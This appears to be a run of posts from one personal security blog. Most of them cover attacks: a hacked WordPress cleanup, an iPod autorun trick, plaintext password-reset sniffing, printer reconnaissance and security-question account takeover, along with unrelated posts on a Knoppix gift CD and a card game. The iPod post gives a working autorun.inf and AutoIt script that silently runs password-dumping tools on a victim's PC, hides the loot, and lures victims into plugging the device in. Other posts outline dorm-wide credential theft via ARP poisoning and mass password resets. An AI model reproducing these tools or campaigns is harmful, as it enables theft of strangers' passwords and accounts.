A great write up of how to clean this mess up can be found here.

To sum it up:

• Remove wp-includes/class-mail.php, its fake.
• Take out the lines hooking into the footer in wp-includes/default-filters.php
• Remove the line from the top of wp-includes/default-filters.php that accepts a file given a random GET variable.

The take away lesson here is: Even if you're not actively publishing on your blog, you better make sure your software is up to date. I've been busy with other stuff and neglected mine, unfortunately.

EDIT: I've done some poking. 194.110.162.23 is out of "Extended Host" in New York City. I'll refrain from scanning it, though I am darn tempted to see what back doors were opened on that box. As it is, I'll just email the host and inform them of the troubles.

In this attack, you take your -insert favorite media player here- to someone with a computer, and ask if you can quickly charge it for 5 minutes before you get back to work. You may sweeten the deal by offering to pass along a song, or share something with them they want. But once you walk away, you have all their passwords. Too good to be true? Not a chance! (Of course I'm targeting Windows in this, if you want to attack Macs or Linux, you just need to improvise a tad more).

Setup
To start with, you need to be able to access the hard drive on your media player. Using Rockbox is an easy way to do this. Once you have access to the media device, we're going to create a file in its root directory, autorun.inf. Something to the effect of:

[autorun]
shellexecute=ipod.exe
icon=ipod.ico

What the above does is declare that its the autorun file, set a custom icon for the ipod (have to make it look the part), and run a special exe we cook up. Save this file, and go grab AutoIt. I've just started using this program in the last 24 hours and man do I like it. Very simple to create exe files. What we're going to do is use this to execute a few password recovery toolkits. The specific ones aren't important, but I'm using ones by Nirsoft, MessenPass, Network Password Recovery, and Mailpass View currently for this demo. Create a folder in the root of your media player "\Hacks\Password\Software\take" and all of the parent folders. You'll want to drop all hacks into the Software folder, and the results of the scans will pop up in the take folder.

The icon I picked (since this is an iPod) was the following:

The exe we're going to create is made with the following Auto-It script which I won't go into detail on as its fairly straightforward, though the formatting is really bad in WordPress, I apologize. A nice version of the file is found here.

Run(@ComSpec & ' /c ".\Hacking\Password\Software\mspass.exe /stext .\Hacking\Password\Software\take\mspass.log"', @ScriptDir, @SW_HIDE)
sleep(200)
Run(@ComSpec & ' /c ".\Hacking\Password\Software\mailpv.exe /stext .\Hacking\Password\Software\take\mailpv.log"', @ScriptDir, @SW_HIDE)
sleep(200)
Run(@ComSpec & ' /c ".\Hacking\Password\Software\netpass.exe /stext .\Hacking\Password\Software\take\netpass.log"', @ScriptDir, @SW_HIDE)
sleep(3000)
Run(@ComSpec & ' /c "COPY .\Hacking\Password\Software\take\*.log .\Hacking\Password\Software\take\all.log"', @ScriptDir, @SW_HIDE)
sleep(3000)
Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC
Dim $Location = @WorkingDir & '.\Hacking\Password\Software\take\'
Dim $FileName = "all.log"
FileMove($Location & $FileName , $Location & $DateTime & ".txt",1)
sleep(3000)
Run(@ComSpec & ' /c "del .\Hacking\Password\Software\take\*.log"', @ScriptDir, @SW_HIDE)
sleep(1000)

Once you have that, build it and name the resulting file ipod.exe. Drop that into the root directory of the media device. We should be all set up now, to check double-click the ipod.exe and see if a text file pops up (it should take roughly 11 seconds to finish everything). If it does, continue on... if not go back up to creating the exe. Once all the files are in place, you probably want to set the files and folders for the hack to hidden. No reason why the mark should see "Hacking" as a root folder, eh?

Execution
Now that we have a working autorun.inf and ipod.exe its as simple as unplugging your media device, then plugging it back in. Thankfully on Windows XP only CDs are allowed to run autorun with no user intervention so we need to click on the media device, however on older versions this stick will run itself. This is where offers of music work wonders. If a business executive will give out a password for a chocolate bar, how many college students will let you open your iPod to give them free music? The first time you double click on the media device it'll run ipod.exe, which happens to run silently. This also pulls up the custom icon, so you can mutter something, then right-click->explore the drive to grab the file you promised them. It appears entirely as if the media device was just loading, and wonder of wonders you recover any passwords stored in plain text. After you walk away, boot the media device into Rockbox, and browse through to see what you got. Evil, huh?

Expanding the Hack
Clearly you can see from this example that anything could be run, it need not be these specific programs, or anything malicious at all. One could pop up any website they wanted, which could be a great Valentine's day gift. Not only do you give a kick butt new media player, but you've personalized it to pop up a website that expresses your love automatically. I guarantee a hug at least, or your money back. I've changed my autorun.inf to be the following:

[autorun]
shellexecute=http://www.stop-phishing.com
icon=ipod.ico

I don't want to be scanning my own system whenever I put new music on, and I really don't want to accidentally attack friends (Shelb, I am so sorry!). Plus the IU informatics department is a great group to give free publicity to.

On the other hand, one could get more evil and toss a rootkit on the device; we all know that's no worse than simply buying a CD. Or perhaps a host of viruses, anything that can be down by a windows executable and 60GB of space is possible here.

Defense
I was remiss last night in posting this without a defense section. The easiest way to prevent it from Autoplaying is to hold shift while inserting any media. This goes for CDs or USB sticks (again on XP you only have to worry about CDs or U3 cruzers). If that fails, a handy trick can be found here to disable autorun in Windows. To quote Thushan Fernando:

1. Start > Run, type in 'gpedit.msc' without the quotes, this will show you the Group Policy Editor.
2. Goto 'Computer Configuration' > 'Administrative Templates' > 'System' and select 'Turn Off Autoplay'
3. When the properties for the policy pops up, check 'Enable' and select 'All Drives' and hit OK.

This option turns off autorun.inf from ever running and I highly recommend it.

Research
This would be a great study to see how many people let you plug in, by incrementing the variable in some text file every time ipod.exe is run. (Note the previous was a benign idea, the following are not likely to be approved research). Other ideas might be to infect it with a virus that listens for an iPod to be plugged in, then records the meta data off the iPod. This then could be tossed into something like the Music Genome Project to identify bands the user might enjoy. Then you either trigger a pop up that targets that band, or wait to catch an email address and send them some personal reminders about new CDs coming out. And of course this could be like any boot sector virus and pass itself along to any iPods that are plugged in at a later point in time.

I hope to keep playing around with the iPod as a platform for hacking as it is so commonplace on a college campus. My ultimate goal probably being getting a sniffer running nicely and saving the pcap file for later dissection. Of course, I'd really like to get the iPod directly on the 'Net without using iPod Linux (since Rockbox is also Free Open Source, but supports many platforms) so that I could plug it into random routers that lay about.

And the best part of all this? You can perform the attack while listening to your favorite tunes!

Well, I just tried to log in to that site on an account I haven't used in... well.. a long time, lets leave it at that. Sadly, I'd forgotten my password, and they do a very smart thing in limiting how many failed logings one can have before resetting the password, forcing me to reset my password. Up to this point, everything is working as it should, removing the possibility of brute force attacks with only limited user annoyance every few months.

Then I noticed that... uh-oh... the reset page wasn't SSL. I thought "Oh, don't worry, I'll bet its posted to an SSL domain," but grepping the source proved otherwise. Bugged, I decided to sniff my traffic and see what was happening, and sure enough, my password flew by in plaintext. This time it wasn't anything as stupid as a "Mother's Maiden Name" type question that also requires a little social engineering, this is MY PASSWORD, and MY USERNAME flying by.

Here's a look at a sanitized version of the information in the packet that gives it all away.

Content-Type:application/x-www-form-urlencoded
Content-Length:102
submitok=1
cc=ff6cda68ba7b4c
tt=1180114618
email=****@****.***
newpass1=PLAINTEXT
newpass2=PLAINTEXT

The Impact:
If I have to be sniffing the traffic in order to catch the password, this isn't as effective as, say, just phishing for the credentials, but this attack doesn't require any human stupidity.

However, this again is a very effective attack for large networks. ARP Poisoning is fairly trivial in this day and age, so even on a switched network one can grab these credentials. On a large network such as a dormitory, or campus this attack will work on as many people as are connected to the router you have access to. Worse, combine this with a botnet or other malware on a victim's machine, and it'll work on everyone who logs on to the site on an infected computer.

Another fun trick, as identified by the researchers at Indiana University, is subverting routers. If one subverts a router to modify the firmware, such an attack could easily be set up to happen on all traffic passing through the router, eliminating the need for ARP Poisoning. However, this requires an insecure router to start with, and the target would be a much smaller number.

The Attack:
I'll talk through an attack from a dormitory, as that's the first I thought of. Once you're set up with your ARP Poisoning, its time to get users to reset their password. Get a large list of email addresses from your school (this is very, very easy to script, you should be able to get tons of addresses. Now, you can either exploit the password reset security feature, or simply hit the reset.php page with each email address. Once you've reset the password, sit and sniff the network for any packets going to the page that actually does the resetting. Save all those packets, and you have all the information you need to compromise the accounts of everyone in your dorm!

I happen to know (whipped up a script to prove it) that this can quite easily be done in Perl where you never have to do anything, just sit and watch the logins go by.

The Payoff:
Once you have all the logins, you can either be very malicious and overt, or very subtle and clever. One might immediately hit the account page to change the password to something to lock out the legitimate user, or maybe even delete the account. Or, to be clever, throw all the logins into a database for later exploitation. It'd be smarter to do the second, because then the attack will go unnoticed for a while.

My Actions:
As usual, I'm accompanying this post with an email to the development squad of that website. I'm not releasing the name of the site, will delete any comments that say what site it is, and won't make my exploit code available anywhere. I will speak for the quality of the site's developers, from my last dealings with them, and know this will be fixed before any real attacks can be launched.

I'd like to start with saying I'm not doing this to be malicious... I'm just curious about these printers. Nothing I do will be aimed at hurting the printer in any way, nor the school network. I'm not doing anything here because I'm bitter or have pent up stress, I need an escape, and here's a great way to spend 30 minutes off in a wonderful world of binary choices where everything works out right. Without further ado: a look at my schools printers.

Tech specs: My school primarily uses HP printers, and specifically we have a LOT of 4350's. I really like these printers, not sure why because I don't know many printers by model number, but they're very user (read: hacker) friendly. Walked right up to one, figured out how to make it spill its guts half a minute later. They print rather fast (52 pages per minute, though PDFs take forever to spool up), and the quality's nice (1200x1200 dpi).

So what does this take? If you walk up to one of these (most modern printers you can adapt this technique to real easily) push the big green check mark button, this brings up the menu. Scroll down one, push the green button again, and you'll get "Information". The first item (if you've got my model) is "Print Menu map", go ahead and do this. In a few seconds, the printer will spit out a nice, two-sided, menu-mapping. Take this to your seat and pretend to proof-read it.

Above you see the administrative section of the printer. Here's some fun stuff including it's IP, and a wealth of other information. Note: Secure Web - Optional... bingo. The other pages have good information as well, well worth poking around.

Lets type that IP we found into our browser, and note that it looks a lot like our printouts, just a prettier display. There doesn't appear, at first glance, to be any special admin control from here (other than being able to pause/resume print jobs), but still kind of cool (check out the "Control Panel" tab... you can read what's on the LCD!).

Ok, that's just kinda cute recon, lets do some real hacking. The picture below is a handy little file tree that the printer will spit out for you. Please note, for those of you who don't know permissions, that there are 9 letters; r (read) w (write) x (execute) repeated three times. They specify the permissions for "owner group other".

Now, our goal is to gain access to this file system, and if we can get FTP, or TELNET up and running, we can look at these lovely files. I'm going to leave that for another day, as I'm getting weird looks from the center desk staff of the library, and I've been here for a bit too long. Back to my run, I hope this was informative!

Quick language lesson: Power Attack - The name of a certain type of attack, usually used on hardware, that determines information from power drawn. This was originally used on smart cards where one could determine the encryption key by measuring the power drawn off the card at certain points in authentication.

So yesterday I was having a somewhat personal conversation with a girl who does CS-like stuff at a really cool University (cool in my mind for some working agreements they have with notable social networking sites). She's a good friend and we'd discussed this topic in the past, but for whatever reason I was being very standoffish. I'll take this time to point out there's nothing illicit going on, I just respect the privacy of anyone I talk to, and the conversation topic might identify her to people that know her.

Well conversation turned to a lighter topic, and involved a scientific equation that I try to live by. At most two people in the world (aside from me) know this equation... and its a closely guarded Snarky-Secret, so it shan't be aired just yet, but after I mentioned this equation I noticed the little 'typing' icon on her GAIM window was on for about a minute. After which she replied "Absolutely true". I pointed out that that was an awfully long time to type such a small phrase, and was able to drag the real message out of her.

Now, that's just a stupid little case where a power attack actually worked, but I was darn proud. This shows that, for those of you who aren't hackers (probably a majority of my readers), you can still apply "hacker techniques" to any area of you life, regardless of if there's obvious overlap or not. Here a technique that's normally used against corporations (to find out when they're working), Smart Cards, and keyboards which effectively took down the most powerful defense known to man.... the female mind.

Hi {Name},

We are aware of the issue that you described, and we will look into some possible solutions that won't disrupt page load times and general site performance. Thanks again, we appreciate the email and the blog post.

Thanks,

{Name}
{Title}
{Site}

I fully expected something more along the lines of a Cease and Desist letter, as I've got quite a few friends who managed to procur those from simply pointing out insecurities. Apparently some corporations feel the correct response to an academic report of a bug on their site is the same response one would use for a malicious hacker attempting to exploit their site. This company, however, was different and literally turned my perspective around. I really, really did not like them for a variety of reasons (mainly revolving around security) but after this they get an A in my book.

Bottom line: No code is flawless, its how you deal with the bug reports that sets your site apart, not how perfect you can make it in the first place.

These guys got it, and once the issue is resolved I might even put their name up here (with their permission) and support them openly because too few companies are that willing to accept criticism and security hole reports.

Anyway, I noticed the other day that a certain site does a huge no no. They only use http:// pages, no https://. Sure, they post the username and password to an https domain, but that's it. Many banks do this also, I can't explain why. Maybe they don't want their users to have to type an extra letter? Granted that's a moot point if you just throw a meta redirect from your http://myhomebank.com/index.html to your https:// domain, but I digress.

This is bad. Why is it bad? First off if I do some DNS pharming I can make the user connect to my evildomain.com where I will change the form action for login to an http domain, or better yet my site. While I have never done this, as obviously that'd be illegal and I never do anything illegal, this is not very hard in a campus setting. While not trivial, dorm networks are normally vulnerable to ARP poisoning, and you can get ~1200 eager college freshman each night logging into your system. Again, this is somewhat of a tangent, suffice it to say, users should *always* be trained to look for the nice yellow bar, and the https so they know they're logging into your site.

Why else should you only use https:// for large, profitable, sites? Because if its http://, I can sniff your traffic. Sure, on a switched network I'd have to ARP poison the router to see the whole dorm's traffic, but I could also just subvert the router and install my sniffer there. Or sit in a computer lab that's wired with a hub (we've got at least two I know of) and see what ~40 people are doing at a time.

Of course, by now you realize that no confidential data ever goes over unsecure lines, right? Your web developers all know just how important your terms of service are. Yea, you can sense the sarcasm already, can't ya? So I poked around this site, and found their security question section they keep pestering me to set. Now this is a feature that almost all major sites have: "Set a security question so we can later identify you." Its not a bad idea at all. I may lose my password, and access to the email I registered with, yet you must now treat these security questions as if they're passwords, because they gain access to the account. Turns out this site sends this setting to their normal account editing php page and that's off a non-SSL secured domain. Which means if you've got a sniffer and a hub like me, its quite easy to find. My laptop popped up this doozy.

0000 00 12 17 3c 68 d9 00 0f 1f 16 20 13 08 00 45 00 ... 0010 00 f6 69 cf 40 00 40 06 2e 2b c0 a8 01 37 cc 0f ..i.@.@..+...7..
0020 14 19 d6 47 00 50 8b 52 2d ea 2b 55 1e 9a 50 18 ...G.P.R-.+U..P.
0030 16 d0 db 58 00 00 43 6f 6e 74 65 6e 74 2d 54 79 ...X..Content-Ty
0040 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f pe: application/
0050 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e x-www-form-urlen
0060 63 6f 64 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c coded..Content-L
0070 65 6e 67 74 68 3a 20 31 33 34 0d 0a 0d 0a 70 6f ength: 134....po
0080 73 74 5f 66 6f 72 6d 5f 69 64 3d 66 66 66 66 66 st_form_id=fffff
0090 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 ffffffffffffffff
00a0 66 66 66 66 66 66 66 66 66 66 66 26 73 65 74 74 fffffffffff&sett
00b0 69 6e 67 73 3d 26 73 61 76 65 5f 73 65 63 71 3d ings=&save_secq=
00c0 31 26 71 75 65 73 74 69 6f 6e 3d 32 26 61 6e 73 1&question=2&ans
00d0 77 65 72 3d 63 75 74 65 2b 67 69 72 6c 26 73 61 wer=cute+girl&sa
00e0 76 65 5f 71 75 65 73 74 69 6f 6e 3d 43 68 61 6e ve_question=Chan
00f0 67 65 2b 53 65 63 75 72 69 74 79 2b 51 75 65 73 ge+Security+Ques
0100 74 69 6f 6e tion

For those that have no clue what's going on in the above, this is an HTTP POST frame that is passing a few variables. Random crap we don't care about, then post_form_id (my guess is some form of checksum to make sure its me), and then some things to save. The one's we're interested in are:

question=2
answer=cute+girl

This means set Question two (which dealt with kissing?) to the answer of "cute girl" (yea, she was pretty cute, geeks know how to pick 'em). I'd like to take this time to point out that that post_form_id is unique to my account. I logged on on two different systems, and got the same one every time. Now, you're saying "But the account isn't passed in the clear! So this means nothing! Noob!!"

Haha, but unfortunately this site passes the account name in the clear. The full packet also included a line consisting of:

login={username}@{domain}.{TLD}...user={usernum}

I've removed the actual hexdump as it gave away way too much information about what site this is.

Please take a minute to note the user name. It is in clear, plain text. If you read the entire disassembled packet, that means the username, and security question are sent in plain text and together. SCARY. Also fun things to notice, you can read my cookies in there. Sure, they're (hopeully) encrypted, but still I'd really like to try a replay attack on here. I'm willing to bet by next week they'll have made sure there's a time stamp encoded somewhere in that junk. That last field is the user you're tracked by on this site. Take that value, and plug it into the profile page of this site, and you're taken to this other person's profile page. So, this is also a great way to meet random people, or friend them if they're sitting next to you for that ultimate stalker feel.

The Attack
Now, we'll perform an attack (on myself). I logged in on my desktop, while running Ethereal from a laptop on the same hub. I then traveresed to the account page, and finally set up my security question (shh.... its a secret). Checked through my ethereal dump, found the two packets I cared about, and stole some values. Among them the target's account name, and security question/answer. Then I opened up an email (from an account completely unrelated to the registered account email), prepared a little message asking to reset my password, and "identifying myself" with the stolen Q&A, hit send, and waited.

Two days later I got a response, they had reset my password. I used a little social engineering in the emails, but any good hacker would be able to do the same. This is completely non-malicious as its my own account and I owned both email accounts involved, and I wanted to change my password anyways. So just obtaining a user's security question can give attackers access to a certain account.

Practicality
Sure, you say, this attack is possible, but how practical is it? I'll give you that this isn't going to compromise the entirety of ANY site (although through a good phishing scam and ARP poisoning someone could get a nice chunk of a campus or office at once) but it is a vulnerability. And now that some social networking sites are tracking credit cards for various reasons, they have a duty to secure their sites as much as possible. Now, these sites are smart and only show the last four of the credit card number, like any business, but I can now use that credit card to order things off the site. Granted, that's just a little stupid attack, but this does give up at least partial credit card data, including expiration data and name and this should NOT be accepted by the public. We must hold financial institutions, and any place that deals with personal information to a higher standard, require HTTPS.

Conclusions
So, this whole incident begs just one question. Why NOT use https://? It requires no additional coding, you're just going over a secure channel. The user doesn't have to type in the s, you can just meta refresh them to that domain. And since you need https to be able to login, you know all your users support it. Its down right stupid, and begging to be hacked to be this large, and not use it. Same goes for any bank that follows the same principles, and brokerages. Heck it seems like every site that would naturally want encryption shrugs it off, and opts instead for plain ol' http://. Please guys, think of your users, and secure your stuff.

I've tried to be really good in this post about removing any information concerning which site it is. Please don't post comments that contain the site in question, as they will be modified and or deleted. I bear no malice towards that site, and I hope they accept this threat as genuine and secure their site ASAP. I will be passing this on to their admins once I post it, with more detailed information, for them to act upon. I'd hope the site will show me leniency, and recognize my intentions are to use this as a warning for all websites in their position.

Requirements
You're going to need the following:

1. Knoppix Live CD. I'm using the most current as of this writing, 5.0.1.
2. A nice sized directory (/home/snarky/data/programming/knoppix in my case) to do the editing on. At least 3 GB free.
3. 1 GB of RAM, if you don't have enough RAM, make a GB of swap space.
4. A sense of comfort with the Linux operating system, and all that goes into it (especially command line stuff). If you don't feel you can do part of this guide, don't bork your system, just pay me to make it for you.

Disclaimer(s)
I'm also kind of weird in the head, one might say, and like to continue long metaphors. So, throughout this article, I won't say "girlfriend", I'll use a computer term. It'll be in italics because otherwise this guide would get even more confusing!

This is my third try at this guide, the first two... didn't work as well as I'd like, so that's why I'm just telling you where to find the certain files you'll want to edit.

Setup
In order to edit this cd for your most significant bit, you'll need to get a good image on your hard drive. I recommend this guide from Knoppix.net. Once you get the compressed file system and all boot-necessary files into directories on your machine, then you can play around with editing the files.

The Editing

1. First off, is the background. While I love advertising for Knoppix, my two's complement deserves to look at a better picture. Pick something of the two of you, or maybe a nice sappy heart, or something more romantic. By default this lives in /usr/local/lib/knoppix.gif. I think you know what to do here, that's right, overwrite that file with your sweet picture! This should be 1024x768, if you can at all manage it, as I didn't find out if the picture will be streatched, centered, or what.
2. Next I had a great idea for the start up sound. Since this'll be the first impression of the custom LoveCD for your int main(), you want it to be something special to them. Yea, you'll have to hear it when you test the disc, but that's no excuse to give her a CD that boots up to a loud rendition of Weird Al's White & Nerdy. Actually, that's a great song, so maybe use that, but I digress.

   This file is stored in /usr/share/sounds/startup.ogg (or .wav). If .ogg is there, that will be played, otherwise the wav will be. If you want to change the type of file, all the config of X is in /etc/X11/Xsession.d/45xsession. This is a nice big file, so I'll tell you if you're using my version of Knoppix its line 104, otherwise grep for a function called "playsound()". If you don't know shell scripting, don't try to edit this file, its huge and nasty, you've been warned. So, again just overwrite the original ogg file with one of your choosing.

3. The low-res ASCII art that shows during boot can be changed also. This lives in the boot.img in the /boot/isolinux/ directory, and you'll have to mount that compressed directory in order to get at a file called logo.16. Put a GIF 640x400 image in there, and use the giftopnm command to get a .ppm file. From there you'll use ppmtolss16 to make a .16 file that will be able to be shown on boot. Since this is really *Not* good quality, it might be best to go with something black and white, and obvious even at low res.
4. Also in that directory is /boot/isolinux/boot.msg. This is the boot message, along with some other stuff. DO NOT change the other stuff, bad things happen, but you can make the boot message be any single line of text you like. If you and your eliza have an inside joke, here's a great place to put it.
5. Another fun thing I found is that index.html file you copied over to the master directory. This is displayed in a browser upon boot, so its the perfect place to leave some special crytographically signed message for the enigma in your life. Just open that file in vi, or any editor you prefer, and edit to your hearts content. I threw in a nice little personal message, and thought about recording a video message if I had a webcam. Could put a file:// link on the opening index.html to have them watch you say sweet things.
6. If your primary hard drive has a specific profession you want to tailor the disc to, go ahead. If you chroot into the directory you're editing in, you can use apt-get (and an internet connection) to change what software is installed. The person I'd make it for would appreciate a bunch of the different games, but not the hacking utilities, so I'd make that change. Also, one can edit a program's settings to make thigns easier. For instance, I'd put their login information into GAIM (username only, no password) so that its real easy for them to jump on and say what an amazing job I did *evil grin*.
7. Along the same lines, one can change individual user options by copying the skel user out of /etc, making it into a /home/knoppix directory, and chowning it to knoppix. Now you can change the .bash_profile, and everything that goes into having your own user. Personally, since I love easter eggs, I'd make their name into a command pointing to a script I made that spits out a random complement: "$name is {array of complements}". I learned long ago that random complements just make your day, even if you give it to yourself. Let them stumble across this little tidbit, or tell them yourself.
8. One can edit the programs that start on logon, as with any machine. Currently it just launches Mozilla on index.html, but me I'd like to make some little widget type app that will mean something to them. That's vauge, but an idea might be popping up a window that rotates through pictures stored on the hard drive, a nice photo album viewer for good memories. Or (and this is more up my alley), pop up bitchX IRC set to log onto a certain server and channel. On this channel you have a bot that'll pass on some kind words just in case you're not there. "Hey $name, has anyone told you you're beautiful today?" "How are you this fine day, gorgeous?" Etc. That way they don't have to be at all technically competant to enjoy the surprise, and it'll happen every time they boot.
9. I'm all about the command line, and think any Linux fan should know how to use it. So you can bet I customize my console colors and fonts, since I spend a ton of time in it. Why not do the same for your mainframe? If they have a favorite color (as all do) design a color scheme around that color to make things feel more like home. Obviously if they're not a coder or Linux nut already, this might go unnoticed. The file you're looking for is in /home/knoppix/.kde/share/config/konsolerc if you made the new user. Or you can use the trick of using chroot and your current X session to load Konsole, and setup the values yourself. Personally, I'm a fan on gnome-terminal, so I'd try to put that in instead, and throw a nice background image of a sunset on it.
10. One of my favorite scripts is a little one I use to change my desktop. I just put a line in crontab calling a certain Python script, and every hour on the fifteen my background is changed to another picture from a certain directory. This can be perfect for a nice directory of a good handful of your most meaningful pictures: prom, wedding, the day your first server came home from the rack, whatever. If you've chrooted the filesystem, you can edit the crontab for your new knoppix user. Among other things you could tack onto here, I'd recommend a nice background changing script to make this disc change a little and keep them wanting to stay booted into it, rather than windows.
11. And just because I like going the extra mile, the 11th change I'd make is going into the ~knoppix/.mozilla/firefox/{profile}/ directory, and making a bookmarks file. Give her a nice selection of her favorite You Tube videos, Flash games, and news sites right at her fingers. Oh, and if you're smart, also a link to your blog and photo site, just to get her comments.

The BURNING!
Now follow your favorite guide for how to make the ISO, and finally burn it, and you're done!

Final Thoughts
While this is really just a "haha, look how cute I can be" I thought that this might be a good gift from someone whose job takes them far away from home for a while. Now, they may not have access to the required devices, but a company could make these CDs at a small fee for two purposes. The first is it'll spread Linux, always a good thing, and the second is it gives one of the people in the relationship a nice, and usable, gift. One thought might be for soldiers stationed in God knows where who could use this as a sort of bootable photo album. Set up an FTP server to let them upload images for background, a video message for their family, and other assorted specific changes. Then it'd be as easy as copying over the base filesystem, overwriting a few, select files, and burning to CD. It could (probably) be automated. I'd actully, *really* like to try to get this up and running if I had the time. Heck, I'd be willing to do it for free, and just have a PayPal "donate if you like" link on the page to cover the small cost of CDs bought in bulk and (mainly) shipping. If anyone would be interested in helping me with this, drop me a line: snarky{at}thesnarky{dot}com.

Bet you didn't think I could keep the computer term as a girlfriend metaphor up, did ya? Its one I've used for a long time, so practice makes perfect, I suppose. I'm single, so don't get to find out just how romantic such a CD is, but if anyone has the guts to give this in a box of chocolates, PLEASE let me know!

If your little love array has never remastered a CD, they might not truly appreciate the hours and frustration spent doing this. It was a lot harder than I initially thought, though that may be because I was using a different version of Knoppix than I thought it was. However, I found a couple of guides to editing Knoppix CDs online, and the best (that I ended up using my first time) was from here. For a different distro, look at this Slax guide.

Now I had an initial idea to write about the religion found in Walraven, but after talking with the creater for a bit, decided this wasn't gonna work. So, the other guys on the IRC channel (developers of walraven / friends of them) started throwing out other ideas related to coding, and I took them and ran with it. Here's what I came up with:

Basically a central part of a hacker's mindset (those that program) is to come up with the most elegant solution for a problem. This may not be the most obvious choice... for instance Carmack (one of the developers behind Quake) has this beauty. It calculates the 1/sqrt(x)... quite fast. In this singlemindedness for elegant code, some coders have various rituals they follow. While most are joking, or just not ritualistic (such as only coding with certain music, or environments), I do know some that take a religious feel. I actually surprised myself by realizing some of my practices classify as religions according to folklore definitions. For instance, jokingly, when I get stuck on code, one of the things I do to prevent myself from breaking stuff is to turn out whatever lights I can, remove my shirt, and draw "Imbued Symbols" on my chest... What do I mean by that? Basically... anything dealing with the language I'm using... Lambdas for scheme, ones, zeros, reg expressions, whatever. Its really joking, but for some reason it helps to focus my mind on the code.

I've even been on coding binges (worst was 20 hours straight after a bad time in my life) where I lose conciousness of the environment around me. My roommate's talked to me in this state before, and I have no knowledge of the conversation. I've, apparently, cursed people up and down in this state, people I'd never curse at, and didn't remember a thing until they confronted be about it. This is called a "heightened state of awareness" with regard to something, in this case code, and nothing else. I know of other programmers who've been sucked in enough by the code to not notice the passage of time, or people talking to them, so I know I'm not just a freak.

Anyways, the professor of this class took 15 minutes today for me to discuss with the class my theory (that this constitutes a vernacular relgion... how each person deals with code) and they were very receptive. In fact, the teacher gave me full credit on the paper, and said that while he wasn't sure he'd buy it when he picked up the paper, he now is fully convinced that at least a very persuasive argument (and that I made a very persuasive one) could be made to that effect, and the rest of the class agreed this could be viewed as a vernacular religion.

Interesting... could I have just coined a new religion without intending to?

Botnet!

Now, that website is nothing more than a placeholder so ya'll don't browse my site... it'll get better I promise, as this game'll be advertised entirely online. Hopefully I can convince the God of CSS (Harkins) to bang out something flashy.

Basically the premise is that you are an upstart botnet mastermind. Your computer might not be the best, and your viruses a tad unstealthy (at first) but you want to make your mark on the world. You move through a "network" of system cards trying to complete missions, or destroy your opponent. Its different from other card games, with some influences showing through. Gameplay is not nailed down yet. So that's all I'll say for now.

One goal we are looking for, however, is to make it somewhat realistic. For instance: the cards all are real-life things, different OSes, ways a cracker might hack something, etc. We don't want to make something that'll just further the fear of teenage punks in dark basements sipping Jolt. Also, we want this to be simple... our first version might have been too simple.

Rules version 1 -

• For this version we did combat as follows: At the end of a turn, whichever side had more viruses on a system won it, and the others were removed. This proved to be a bit... weird... due to modifiers and deciding who was attacking whom. This has been scrapped.
• We did movement by having a limit to how many different viruses one can move, and how far they can move through the network. This slowed things down in the beginning, and is being reworked.
• Income was kept over turn endings, and couldn't be spent quick enough due to a small hand limit. This is definately changing in a few ways, as we'll probably make you clear your income every turn, among other things.
• All in all, it was a tad fun, and should be loads more once the game's sped up a bit, and you actually have to make decisions about spending money or saving it.

Those're my brief and very disorganized (still banging on xorg from my previous post) thoughts on the first system we play tested. Harkins, if you think of anything you'd like to add, feel free.

Current rules will be kept at: Here
Cards can be viewed and printed at: Here
Forums are: Here